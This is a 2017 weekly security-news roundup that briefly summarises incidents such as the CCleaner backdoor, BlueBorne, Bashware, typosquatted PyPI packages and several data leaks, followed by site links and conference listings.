18 September 2017

Week in review: major security incidents in September 11-17

Week in review: major security incidents in September 11-17


-         FireEye in its report announced about increase of attacks against cryptocurrency exchanges performed by hackers from North Korea. Researchers for the cybersecurity company have been observing hackers’ activity since 2016. During this time malicious users compromised 4 wallets in Yapizon, 3 cryptocurrency exchanges in North Korea, British news portal.

A hacking group TEMP.Hermit, supposedly related to North Korean government is under suspicion.

-         Researchers for Checkpoint Gal Elbaz and Dvir Atias discovered a new method allowing any ransomware to bypass modern security products. The technique, dubbed Bashware, takes advantage of the WSL (Windows Subsystem for Linux) mechanism and runs ELF an EXE malicious payloads to bypass next-generation anti-viruses and anti-ransomware.

-         For past 2 months WordPress websites have been spreading a new backdoor.

A malicious code was detected in Digital Widgets plugin for WordPress. Until the malicious code was revealed, about 200,000 users, having installed the plugin, became affected. The backdoor tracked information on the system and passed to external servers.

Investigations performed by security expert David Law and companies White Fir Design and Wordfence showed that the man behind plugin spam was the Briton Mason Soiza. He bought the plugin May 19, 2017, for $15,000 and developed new affected versions during all this time.


-         Sophos revealed a new RAT, dubbed Kedi. Trojan has been delivered during phishing attacks in Gmail and used malicious payloads pretending to be a Citrix utility.

Kedi’s noticeable feature is the ability to communicate with its C&C via Gmail, DNS and HTTPS requests.

-         Security experts detected 8 BlueBorne vulnerabilities, targeting over 5 billion users. The issue affects the Bluetooth implementations in Android, iOS, Microsoft, and Linux and allows a remote attacker to compromise the system via Bluetooth.

-         LinkedIn again became the victim of malicious activity. Experts for MalwareBytes reported that attackers used previously hacked long standing and trusted accounts to spread phishing messages containing a shared document and malicious link via the InMail feature. When following the link, the victim is redirected to a phishing site for Gmail or other email providers which require registration. The total number of compromised accounts is currently unknown.

-         A popular Netherlandish cryptocurrency exchange LiteBit.eu became the subject of cyberattack for the second time. The first issue dates back to August 5.

Eventually, hackers accessed customers’ personal information (email address, hashed password, IBANs, phone number, address and portfolio data) while no bitcoin was stolen. Litebit site administration reported that they have already called to the police and the Dutch Data Protection Authority for investigation.

-         During customer beta testing of Cisco Talos new exploit detection technology, the security experts identified a two-stage backdoor in CCleaner v5.33. The compromised version was distributed by Avast from official website repository. It was signed using a valid certificate that was issued to Piriform Ltd. (former owner of CCleaner). The incident was detected on September 12. A total level of the malicious impact is mega-huge. As of November 2016, a number of CCleaner downloads amounted over 2 billion and is increasing by about 5 million new users every week.


-         Russian-speaking hackers were observed to use a new variant of the RouteX malware to infect Netgear routers and perform attacks against Fortune 500 firms.

The malware was uncovered and analyzed by the researchers at US-based cybersecurity firm Forkbombus Labs. Experts suggest that the revealed issue is connected with Russian hacker, dubbed Links.


-         Kromtech discovered a publicly available database containing confidential information of 593 328 citizens (Alaska voters). The database belongs to TargetSmart, a leading provider of political data and technology. The issue occurred due to CouchDB misconfiguration.

According to TargetSmart, data leak happened because of improper data protection by Equals3, an AI software company based in Minnesota. Equals3 chief executive Dan Mallin stated that there is no evidence that information was revealed by anyone except Kromtech experts.

-         OurMine continues to damage popular services. This time hacking group compromised an American multinational video hosting service Vevo. Attackers published over 3 TB of office documents, videos and promotional materials. Vevo representatives confirmed the leak and suggested that data were stolen in a result of phishing attacks targeting LinkedIn.

-         Experts for the Slovak National Security Office (NBU) discovered ten malicious libraries in Python code, uploaded on PyPI repository. Due to the service does not perform any security checks during new data upload, the malevolent packages have been active since June till September of the current year.

Hackers used typosquatting technique to upload malicious Python libraries with the installation script, setup.py containing a benign code.

The malicious code collects such data as name and version of the fake package, the username of the user who installed the package, the user's computer hostname and sends it to a Chinese IP address at "".


-         The Swiss Government informed about a cyberattack against Swiss Defense Ministry. The incident was revealed in July. Experts found that hackers were using software referring to Turla malware family.

The government doesn’t disclose details of the attack origin and actual damage it caused.

By Olga Vikiriuk

Back to the list

Latest Posts

Week in review: major security incidents in October 9-15

Week in review: major security incidents in October 9-15

The article contains a brief report of cybersecurity incidents for the past week.
16 October 2017
Week in review: major security incidents in October 2-8

Week in review: major security incidents in October 2-8

The article contains a brief report of cybersecurity incidents for the past week.
9 October 2017
Week in review: major security incidents in September 25 – October 1

Week in review: major security incidents in September 25 – October 1

The article contains a brief report of cybersecurity incidents for the past week.
3 October 2017
Featured vulnerabilities
FreeBSD update for WPA2 protocol
Medium Patched | 18 Oct, 2017
Information disclosure in Tor
Low Patched | 17 Oct, 2017

Future events
Location: Na Strži 65/1702, Praha 4
Links: http://financnictvi.konference.cz/

Technologické inovace ve finančním sektoru (FINTECH). Kybernetická bezpečnost, risk management, decision engine, datová analýza, reporting, platformy bezpečnostních technologií, mobilní aplikace v globálním světě financí, projektové řízení, případové studie.
Location: Bajkalská 25/A, Bratislava
Links: http://bdd.exponet.sk/

Explózia dát je nepochybne sprievodným javom súčasnosti. Preto aj problematika bezpečnosti a dostupnosti dát zaznamenáva prevratný rozvoj a jej obsah a rozsah sa mení tiež v súvislosti s vývojom nových technológií. Ochrana dát sa netýka len jednotlivých zariadení, ale aj sietí, online úložísk a služieb. Množstvo dát, portfólio zariadení a úložisk sa tiež významne rozširuje s nástupom internetu vecí. Konferencia sa zameriava na aktuálne trendy a možnosti lepšej ochrany a efektívnej práce s dátami.
Location: Na Strži 65/1702, Praha 4
Links: http://did.konference.cz/

Konference přinese aktuální témata, vystoupení předních odborníků z praxe i z akademického prostředí, případové studie. V popředí zájmu budou big data, data analytics, propojování interních a externích dat, business intelligence, geodata, open data,  big data ve finančnictví, vzdělávání i astronomii.